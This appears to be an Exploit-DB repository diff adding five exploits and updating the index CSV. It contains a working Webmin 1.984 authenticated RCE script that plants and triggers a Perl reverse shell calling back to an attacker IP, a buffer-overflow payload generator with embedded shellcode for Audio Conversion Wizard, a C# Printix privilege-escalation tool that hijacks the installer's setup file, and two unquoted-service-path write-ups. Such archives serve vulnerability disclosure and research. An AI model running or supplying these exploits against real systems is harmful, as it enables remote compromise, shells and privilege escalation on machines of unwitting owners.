DB: 2022-03-10

5 changes to exploits/shellcodes

Cobian Backup 0.9 - Unquoted Service Path
Audio Conversion Wizard v2.01 - Buffer Overflow
Printix Client 1.3.1106.0 - Privilege Escalation
Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path

Webmin 1.984 - Remote Code Execution (Authenticated)

exploits/linux/webapps/50809.py

@@ -0,0 +1,156 @@
+# Exploit Title: Webmin 1.984 - Remote Code Execution (Authenticated)
+# Date: 2022-03-06
+# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
+# Vendor Homepage: https://www.webmin.com/
+# Software Link: https://github.com/webmin/webmin/archive/refs/tags/1.984.zip
+# Version: <= 1.984
+# Tested on: Ubuntu 18
+# Reference: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell
+
+
+#!/usr/bin/python3
+
+"""
+Coded by: @faisalfs10x
+GitHub: https://github.com/faisalfs10x
+Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
+"""
+
+import requests
+import urllib3
+import argparse
+import os
+import time
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+TGREEN =  '\033[32m'
+TRED =  '\033[31m'
+TCYAN =  '\033[36m'
+TSHELL =  '\033[32;1m'
+ENDC = '\033[m'
+
+class Exploit(object):
+    def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname):
+        self.target = target
+        self.username = username
+        self.password = password
+        self.py3http_server = py3http_server
+        self.pyhttp_port = pyhttp_port
+        self.upload_path = upload_path
+        self.callback_ip = callback_ip
+        self.callback_port = callback_port
+        self.fname = fname
+
+        #self.proxies = proxies
+        self.s = requests.Session()
+
+
+    def gen_payload(self):
+        payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip  + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''')
+        print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC)
+        f = open(f"{self.fname}", "w")
+        f.write(payload)
+        f.close()
+
+    def login(self):
+        login_url = self.target + "/session_login.cgi"
+        cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" }
+
+        data = { 'user' : self.username, 'pass' : self.password }
+        try:
+            r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
+            success_message = 'System hostname'
+            if success_message in r.text:
+                print(TGREEN + "[+] Login Successful", ENDC)
+            else:
+                print(TRED +"[-] Login Failed", ENDC)
+                exit()
+
+        except requests.Timeout as e:
+            print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", ENDC)
+            exit()
+
+    def pyhttp_server(self):
+        print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n')
+        os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up
+        print('[+] Sleep 3 second to ensure http server is up!')
+        time.sleep(3) # Sleep for 3 seconds to ensure http server is up!
+
+    def download_remote_url(self):
+        download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin"
+        headers = {
+                    "Accept": "application/json, text/javascript, */*; q=0.01",
+                    "Accept-Encoding": "gzip, deflate",
+                    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+                    "X-Requested-With": "XMLHttpRequest",
+                    "Referer": self.target + "/filemin/?xnavigation=1"
+        }
+
+        data = {
+                'link': "http://" + self.py3http_server + "/" + self.fname,
+                'username': '',
+                'password': '',
+                'path': self.upload_path
+        }
+
+        r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True)
+        print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}")
+
+    def modify_permission(self):
+        modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30"
+        headers = { "Referer": self.target + "/filemin/?xnavigation=1" }
+        data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path }
+
+        r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True)
+        print(f"[+] Modifying permission of {self.fname} to 0755")
+
+    def exec_revshell(self):
+        url = self.target + '/' + self.fname
+        try:
+            r = self.s.get(url, verify=False, allow_redirects=True, timeout=3)
+        except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned!
+            print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC)
+            print("[+] Shell location: " + url)
+        else:
+            print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC)
+
+    def do_cleanup(self):
+        print(TCYAN + '\n[+] Cleaning up ')
+        print(f'[+] Killing: http.server on port {self.pyhttp_port}')
+        os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})')
+        exit()
+
+    def run(self):
+        self.gen_payload()
+        self.login()
+        self.pyhttp_server()
+        self.download_remote_url()
+        self.modify_permission()
+        self.exec_revshell()
+        self.do_cleanup()
+
+
+if __name__ == "__main__":
+
+    parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell')
+    parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000')
+    parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123')
+    parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080')
+    parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell')
+    parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell')
+    parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0')
+    args = parser.parse_args()
+
+    target = args.target
+    username = args.credential.split(':')[0]
+    password = args.credential.split(':')[1]
+    py3http_server = args.py3http_server
+    pyhttp_port = py3http_server.split(':')[1]
+    callback_ip = args.callback_ip
+    callback_port = args.callback_port
+    upload_path = "/usr/share/webmin" # the default installation of Webmin Debian Package, may be in different location if installed using other method.
+    fname = "revshell.cgi" # CGI script name, you may change to different name
+
+    pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname)
+    pwn.run()

exploits/windows/local/50810.txt

@@ -0,0 +1,25 @@
+# Exploit Title: Cobian Backup 0.9 - Unquoted Service Path
+# Date: 06/03/2022
+# Exploit Author: Hejap Zairy
+# Vendor Homepage: https://www.cobiansoft.com//
+# Software Link: https://www.cobiansoft.com/download.php/
+# Version:0.9.93
+# Tested: Windows 10 Pro x64 es
+
+C:\Users\Hejap>sc qc CobianReflectorService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: CobianReflectorService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Cobian Reflector\Cobian.Reflector.Service.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Cobian Reflector Engine
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

exploits/windows/local/50811.py

@@ -0,0 +1,59 @@
+# Exploit Title: Audio Conversion Wizard v2.01 - Buffer Overflow
+# Exploit Author: Hejap Zairy
+# Date: 03.07.2022
+# Software Link:   https://www.litexmedia.com/acwizard.exe
+# Tested Version: v2.01
+# Tested on: Windows 10 64bit
+
+# 1.- Run python code : 0day-Hejap_Zairy.py
+# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
+# 3.- Open Audio Conversion Wizard and press Enter Code
+# 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code'
+# 5.- Click 'OK'
+
+# Author  Code By Hejap Zairy
+#!/usr/bin/env python
+
+from pwn import *
+
+buffer = "\x41" * 1016
+push_esp  =  p32(0x1004dbff) #push esp ret ret from  id3lib.dll
+nops =  "\x90" * 15#515 tshhh theardlooo love Malware
+#msfvenom   --arch x64  windows/x64/shell_reverse_tcp  lhost=ip lport=443      -f python -e x64/shikata_ga_nai  -b "\x00\x0a\x0d\x20"
+#msfvenom  --arch x64  -p windows/x64/messagebox   TEXT="0day Hejap Zairy"  -f python -e x64/shikata_ga_nai  EXITFUNC=thread -b "\x00\x0a\x0d\x20"
+buf =  b""
+buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00"
+buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"
+buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e"
+buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9"
+buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52"
+buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00"
+buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b"
+buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48"
+buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
+buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
+buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6"
+buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b"
+buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
+buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
+buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0"
+buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff"
+buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a"
+buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31"
+buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a"
+buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28"
+buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"
+buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79"
+buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00"
+buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00"
+padding ="C" * (len(buffer) - len(push_esp) - len(nops))
+payload = buffer  + push_esp + nops + buf + padding
+try:
+    with open("0day_Hejap.txt","wb") as f:
+        print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload))
+        f.write(payload)
+        f.close()
+        print("[+] File created!")
+except:
+    print("[-]File cannot be created")

exploits/windows/local/50812.cs

@@ -0,0 +1,184 @@
+# Exploit Title: Printix Client 1.3.1106.0 - Privilege Escalation
+# Date: 3/2/2022
+# Exploit Author: Logan Latvala
+# Vendor Homepage: https://printix.net
+# Software Link:
+https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
+# Version: <= 1.3.1106.0
+# Tested on: Windows 7, Windows 8, Windows 10, Windows 11
+# CVE : CVE-2022-25090
+# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25090
+
+using System;
+using System.Runtime.InteropServices;
+using System.Drawing;
+
+using System.Reflection;
+using System.Threading;
+using System.IO;
+using System.Text;
+using System.Resources;
+using System.Diagnostics;
+
+//Assembly COM for transparent creation of the application.
+
+//End of Assembly COM For Transparent Creation usage.
+public class Program
+{
+	//Initiator class for the program, the program starts on the main method.
+	public static void Main(string[] args)
+	{
+		//Console.SetWindowSize(120,30);
+		//Console.SetBufferSize(120,30);
+		Console.ForegroundColor = ConsoleColor.Blue;
+		Console.WriteLine("┌─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
+		Console.WriteLine("├			  oo dP                           dP                                ");
+		Console.ForegroundColor = ConsoleColor.Red;
+		Console.WriteLine("├			     88                           88                                ");
+		Console.ForegroundColor = ConsoleColor.Green;
+		Console.WriteLine("├			  dP 88d888b. .d8888b. d888888b d8888P .d8888b. 88d8b.d8b. 88d888b. ");
+		Console.ForegroundColor = ConsoleColor.Blue;
+		Console.WriteLine("├			  88 88'  `88 88'  `88    .d8P'   88   88ooood8 88'`88'`88 88'  `88 ");
+		Console.ForegroundColor = ConsoleColor.Yellow;
+		Console.WriteLine("├			  88 88    88 88.  .88  .Y8P      88   88.  ... 88  88  88 88.  .88 ");
+		Console.ForegroundColor = ConsoleColor.Magenta;
+		Console.WriteLine("├			  dP dP    dP `88888P8 d888888P   dP   `88888P' dP  dP  dP 88Y888P' ");
+		Console.WriteLine("├			                                                           88       ");
+		Console.WriteLine("├			                                                           dP       ");
+		Console.ForegroundColor = ConsoleColor.Blue;
+		Console.Write("├			                        For ");
+		Console.ForegroundColor = ConsoleColor.Magenta;
+		Console.Write("Printix ");
+		Console.ForegroundColor = ConsoleColor.Blue;
+		Console.Write("Services                       Designed By Logan Latvala\n");
+		Console.WriteLine("└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
+		Thread.Sleep(3000);
+		string filesH = "";
+		Console.WriteLine("Drag and drop a payload onto this application for execution.");
+		try
+		{
+			if (args[0]?.Length >0)
+			{
+				Console.WriteLine("File Added: " + args[0]);
+			}
+
+		}
+		catch (Exception e)
+		{
+			Console.WriteLine("You\'re missing a file here, please ensure that you drag and drop a payload to execute.\n \n We'll print the error for you right here...\n \n");
+			Console.ForegroundColor = ConsoleColor.Red;
+			Console.WriteLine(e);
+			Console.ReadLine();
+			Environment.Exit(40);
+		}
+
+
+		Console.WriteLine("\n We're going to look for your printix installer, one moment...");
+		string[] installerSearch = Directory.GetFiles(@"C:\windows\installer\", "*.msi", SearchOption.AllDirectories);
+
+		double mCheck = 1.00;
+
+		string trueInstaller = "";
+		//Starts to enumerate window's installer directory for an author with the name of printix.
+		foreach (string path in installerSearch)
+		{
+			Console.WriteLine("Searching Files: {0} / {1} Files", mCheck, installerSearch.Length);
+			Console.WriteLine("Searching Files... " + (Math.Round((mCheck / installerSearch.Length) * 100)) + "% Done.");
+			if (readFileProperties(path, "Printix"))
+			{
+				trueInstaller = path;
+				Console.WriteLine("We've found your installer, we'll finish enumeration.");
+				goto MGMA;
+			}
+			mCheck++;
+		}
+	//Flag for enumeration when the loop needs to exit, since it shouldn't loop infinitely.
+	MGMA:
+		if (trueInstaller == "")
+		{
+			Console.WriteLine("We can't find your installer, you are not vulnerable.");
+			Thread.Sleep(2000);
+			Environment.Exit(12);
+		}
+		Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
+		Console.WriteLine("├ We are starting to enumerate your temporary directory.");
+		Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
+
+		//Start a new thread here for enumeration.
+
+		Thread t = new Thread(() => newTempThread(filesH, args));
+		t.Start();
+
+
+
+		Process.Start(trueInstaller);
+
+
+
+		Console.WriteLine("All done.");
+		Console.ReadLine();
+	}
+	public static void newTempThread(string filesH, string[] args)
+	{
+		while (true)
+		{
+			try
+			{
+				//Starts the inheriting process for printix, in which scans for the files and relays their contents.
+				string[] files = Directory.GetFiles(@"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp\", "msiwrapper.ini", SearchOption.AllDirectories);
+				if (!string.IsNullOrEmpty(files[0]))
+				{
+					foreach (string fl in files)
+					{
+						if (!filesH.Contains(fl))
+						{
+
+							//filesH += " " + fl;
+							string[] fileText = File.ReadAllLines(fl);
+							int linerc = 0;
+							foreach (string liners in fileText)
+							{
+
+								if (liners.Contains("SetupFileName"))
+								{
+
+									//Most likely the temporary directory for setup, which presents it properly.
+									Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
+									Console.WriteLine("├ " + fl);
+									fileText[linerc] = @"SetupFileName=" + "\"" + args[0] + "\"";
+									Console.WriteLine("├ " + fileText[linerc] + "");
+									Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
+									Console.WriteLine("│");
+									filesH += " " + fl;
+
+									File.WriteAllText(fl, string.Empty);
+									File.WriteAllLines(fl, fileText);
+								}
+								linerc++;
+							}
+						}
+					}
+				}
+			}
+			catch (Exception e) { Console.WriteLine("There was an error, try re-running the program. \n" + e); Console.ReadLine(); }
+
+			Thread.Sleep(20);
+		}
+	}
+	public static bool readFileProperties(string file, string filter)
+	{
+		System.Diagnostics.Process process = new System.Diagnostics.Process();
+		System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
+		startInfo.UseShellExecute = false;
+		startInfo.RedirectStandardOutput = true;
+		startInfo.FileName = "CMD.exe";
+		startInfo.Arguments = "/c PowerShell -Command \"$FilePath='" + file + "'; Write-Host ((New-Object -COMObject Shell.Application).NameSpace((Split-Path -Parent -Path $FilePath))).ParseName((Split-Path -Leaf -Path $FilePath)).ExtendedProperty('System.Author')\"";
+		process.StartInfo = startInfo;
+		process.Start();
+		string output = process.StandardOutput.ReadToEnd();
+		process.WaitForExit();
+		if (output.Contains(filter)) { return true; }
+		else { return false; }
+		//wmic datafile where Name="F:\\ekojs.txt" get Description,Path,Status,Version
+	}
+}

exploits/windows/local/50813.txt

@@ -0,0 +1,35 @@
+# Exploit Title: Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path
+# Discovery by: Mohamed Alzhrani
+# Discovery Date: 2022-03-08
+# Vendor Homepage: https://www.wondershare.com/
+# Software Link : https://download.wondershare.com/drfone_full3360.exe
+# Tested Version: 12.0.18
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\Users\0xMaz>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
+
+Wondershare Install Assist Service	Wondershare InstallAssist	C:\ProgramData\Wondershare\Service\InstallAssistService.exe 	Auto
+
+
+# Service info:
+
+C:\Users\0xMaz>sc qc "Wondershare InstallAssist"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Wondershare InstallAssist
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\ProgramData\Wondershare\Service\InstallAssistService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Wondershare Install Assist Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+The local user able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

files_exploits.csv

@@ -11462,6 +11462,10 @@ id,file,description,date,author,type,platform,port
 50806,exploits/windows/local/50806.txt,"Malwarebytes 4.5 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
 50807,exploits/windows/local/50807.txt,"Foxit PDF Reader 11.0 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
 50808,exploits/linux/local/50808.c,"Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)",1970-01-01,"Lance Biggerstaff",local,linux,
+50810,exploits/windows/local/50810.txt,"Cobian Backup 0.9 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
+50811,exploits/windows/local/50811.py,"Audio Conversion Wizard v2.01 - Buffer Overflow",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
+50812,exploits/windows/local/50812.cs,"Printix Client 1.3.1106.0 - Privilege Escalation",1970-01-01,"Logan Latvala",local,windows,
+50813,exploits/windows/local/50813.txt,"Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path",1970-01-01,"Mohamed Alzhrani",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44878,3 +44882,4 @@ id,file,description,date,author,type,platform,port
 50801,exploits/php/webapps/50801.py,"Attendance and Payroll System v1.0 - Remote Code Execution (RCE)",1970-01-01,pr0z,webapps,php,
 50802,exploits/php/webapps/50802.py,"Attendance and Payroll System v1.0 - SQLi Authentication Bypass",1970-01-01,pr0z,webapps,php,
 50803,exploits/multiple/webapps/50803.py,"Hasura GraphQL 2.2.0 - Information Disclosure",1970-01-01,"Dolev Farhi",webapps,multiple,
+50809,exploits/linux/webapps/50809.py,"Webmin 1.984 - Remote Code Execution (Authenticated)",1970-01-01,faisalfs10x,webapps,linux,